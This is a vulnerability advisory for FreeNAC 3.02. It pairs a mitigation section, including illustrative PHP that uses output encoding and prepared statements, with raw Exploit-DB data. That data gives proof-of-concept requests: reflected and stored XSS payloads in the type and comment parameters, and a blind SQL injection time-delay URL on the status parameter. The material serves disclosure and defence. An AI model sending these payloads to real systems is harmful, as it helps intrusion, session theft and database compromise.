Vendor: FreeNAC
By: Blake
CVSS: N/A
Severity: MEDIUM
Title: SQL Injection and XSS
CWE: 79
Product Name: FreeNAC
Affected Version From: 03.02
Affected Version To: 03.02
Patch Exists: YES
Related CWE:
CPE: a:freenac_project:freenac:3.02
Metasploit:
Other Scripts:
Platforms Tested: Ubuntu 8.04
Year: 2012

FreeNAC version 3.02 SQL Injection and XSS Vulnerabilities

Multiple parameters in FreeNAC version 3.02 are vulnerable to reflected cross-site scripting (XSS). The affected parameters are comment, mac, graphtype, type, and name. Script injected into these parameters is written back into the page without encoding, so it executes in the browser of whoever views the response. This can lead to theft of sensitive information, session hijacking, or defacement of the site.

Mitigation:

To mitigate the XSS vulnerabilities, validate input and, above all, encode every user-supplied value at the point where it is written into HTML (attribute values as well as text). A web application firewall can additionally detect and block script injection attempts, but it is a secondary control. For the SQL injection vulnerability, pass user-supplied values to the database only through parameterized queries or prepared statements, so that input such as the status parameter is never concatenated into SQL text.
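The following PHP is an added illustration of the two mitigations described above, written for this page; it is not FreeNAC's own code. It reuses the payloads quoted in the advisory below (the type and comment parameters for XSS, the status parameter for SQL injection) but the function names, the systems table with its id and status columns, the assumption that status and action_idx are integer identifiers, and the use of PDO with an in-memory SQLite database are all assumptions made for the example.

```php
<?php
// Added example (not FreeNAC code): output encoding for values reflected
// into HTML, and a parameterised query for the status parameter.
// Function names, table/column names and the PDO/SQLite setup are assumed.

declare(strict_types=1);

// Encode a value for use inside an HTML attribute or text node.
// ENT_QUOTES escapes both ' and " so the value cannot close an attribute;
// ENT_SUBSTITUTE returns U+FFFD instead of '' on malformed input.
function html_attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML401, 'ISO-8859-1');
}

// Vulnerable shape (hypothetical): the query-string value is pasted straight
// into the img src, which is what the advisory's stats.php response shows.
//   echo '<img src="statgraph.php?stattype=' . $_GET['type'] . '&graphtype=bar">';
// Hardened: URL-encode the query, then HTML-encode at the output sink.
function render_stat_graph(string $type, string $graphtype): string
{
    $src = 'statgraph.php?' . http_build_query(
        ['stattype' => $type, 'order' => 'DESC', 'graphtype' => $graphtype]
    );
    return '<img src="' . html_attr($src) . '"><br>';
}

// Same rule for the comment field that deviceadd.php echoes back.
function render_comment_field(string $comment): string
{
    return '<input name="comment" type="text" size="40" value="' . html_attr($comment) . '" />';
}

// Vulnerable shape (hypothetical): status concatenated into SQL text, so
// "1 AND SLEEP(20)" becomes part of the statement.
//   $db->query("UPDATE systems SET status=" . $_GET['status'] . " WHERE id=" . $_GET['action_idx']);
// Hardened: validate the type, then bind as an integer parameter.
function update_device_status(PDO $db, string $status, string $idx): int
{
    if (!ctype_digit($status) || !ctype_digit($idx)) {
        throw new InvalidArgumentException('status and action_idx must be integers');
    }
    $stmt = $db->prepare('UPDATE systems SET status = :status WHERE id = :id');
    $stmt->bindValue(':status', (int) $status, PDO::PARAM_INT);
    $stmt->bindValue(':id', (int) $idx, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

// Demonstration with the payloads quoted in the advisory.
echo render_stat_graph('vlan13<script>alert(1)</script>', 'bar'), PHP_EOL;
echo render_comment_field('"><script>alert(2)</script>'), PHP_EOL;

// Assumed schema: a systems table with integer id and status columns.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE systems (id INTEGER PRIMARY KEY, status INTEGER)');
$db->exec('INSERT INTO systems (id, status) VALUES (1, 0)');

echo update_device_status($db, '1', '1'), ' row updated', PHP_EOL;
try {
    update_device_status($db, '1 AND SLEEP(20)', '1');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

Run it with `php example.php`. The first two lines of output show the script tags arriving in the page as `&lt;script&gt;` rather than as markup, and the last line shows the time-delay payload being rejected before any SQL is built. Binding with PDO::PARAM_INT on its own would also stop the injection; the ctype_digit check in front of it is there so that a bad value fails loudly instead of being silently coerced.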

Exploit-DB raw data:

FreeNAC version 3.02 SQL Injection and XSS Vulnerabilities
Date: May 19, 2012
Author: Blake
Software Link: http://sourceforge.net/project/showfiles.php?group_id=170004
Version: 3.02
Tested on: Ubuntu 8.04 (freenac version 3.02 vmware appliance)

FreeNAC provides Virtual LAN assignment, LAN access control (for all kinds of network devices such as servers, workstations, printers, IP phones, etc.) and live network end-device discovery. Both 802.1x and Cisco's VMPS port security modes are supported. VLAN and switch port management and documentation of patch cabling are also included.


==========================================================================================================================================
Reflective Cross-Site Scripting:
Multiple parameters are vulnerable to reflective cross-site scripting.

Affected Parameters:
comment
mac 
graphtype
type 
name


Example Request:
GET /stats.php?graphtype=bar&type=vlan13<script>alert(1)</script> HTTP/1.1
Host: 192.168.1.118
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Proxy-Connection: keep-alive
Referer: http://192.168.1.118/stats.php?graphtype=bar&type=switch
Cookie: freenac=92bcf3d911d94e33106c2e79745e8e8e

Example Response:
HTTP/1.1 200 OK
Date: Sat, 19 May 2012 17:42:41 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 5676
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" 
     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
	<html xmlns="http://www.w3.org/1999/xhtml">
	<head>
	  <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
	  <title>FreeNAC :: Swisscom ::</title>
	  <link href="bw.css" rel="stylesheet" type="text/css" />
	</head>
<a href='./index.html' title='Main Menu'><img src='./images/logo_small.png' border='0' /></a>


..........snip......................

<img src="statgraph.php?stattype=vlan13<script>alert(1)</script>&order=DESC&graphtype=bar"><br>
<br>  <p class='UpdateMsg'>Database error</p>
  <p>Please go <a HREF='javascript:javascript:history.go(-1)'>back to the previous screen</a>, or the 
  <a href='./index.php' >Main Menu</a> and start again, or try again later.  </p>




==========================================================================================================================================
Stored Cross-Site Scripting:
The comment parameter is vulnerable to stored cross-site scripting.

Example Request:
<changed from a POST to a GET>
http://192.168.1.118/deviceadd.php?name=test&mac=0001.0001.0001&status=1&vlan=6&username=2&office=1&comment="><script>alert(2)</script>&action=Update&action_idx=1

Example Response:
HTTP/1.1 200 OK
Date: Sat, 19 May 2012 17:53:38 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6945
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" 
     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
	<html xmlns="http://www.w3.org/1999/xhtml">
	<head>
	  <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
	  <title>FreeNAC :: Swisscom ::</title>
	  <link href="bw.css" rel="stylesheet" type="text/css" />
	</head>
<a href='./index.html' title='Main Menu'><img src='./images/logo_small.png' border='0' /></a>

.............snip.................

</td></tr>
         <tr><td>Switch:</td>
           <td>, port= , location=  </td>
           <td><input type="submit" name="action" class="bluebox" value="Restart Port" /> </td>
         </tr> <tr><td>Comment:</td><td>
<input name="comment" type="text" size=40 value=""><script>alert(2)</script>"/>
</td><td>Last IP:NONE<br></td>
<tr><td> </td><td></td></tr>
          <tr><td> </td><td>
          <input type="submit" name="action" class="bluebox" value="Update" /> 
          <input type="submit" name="action" class="bluebox" value="Delete" 
            onClick="javascript:return confirm('Really DELETE this end-device record?')"
            />
          </td></tr>'<tr><td> </td><td></td></tr>
<tr><td> </td><td></td></tr>
</table> <table id='t3-2' width='760' border='0' class='text13'><tr><td> </td><td></td></tr>
<tr><td colspan=3 bgcolor="#DEDEDE"><b>Administrative information</b><tr><td>Inventory:<td>
<tr><td>Classification:


............snip....................





==========================================================================================================================================
SQL Injection:

The status parameter is vulnerable to blind SQL Injection.
Injecting a time-delay of 20 seconds:

http://192.168.1.118/deviceadd.php?name=test&mac=0001.0001.0001&status=1+AND+SLEEP(20)&vlan=6&username=2&office=1&comment=&action=Update&action_idx=1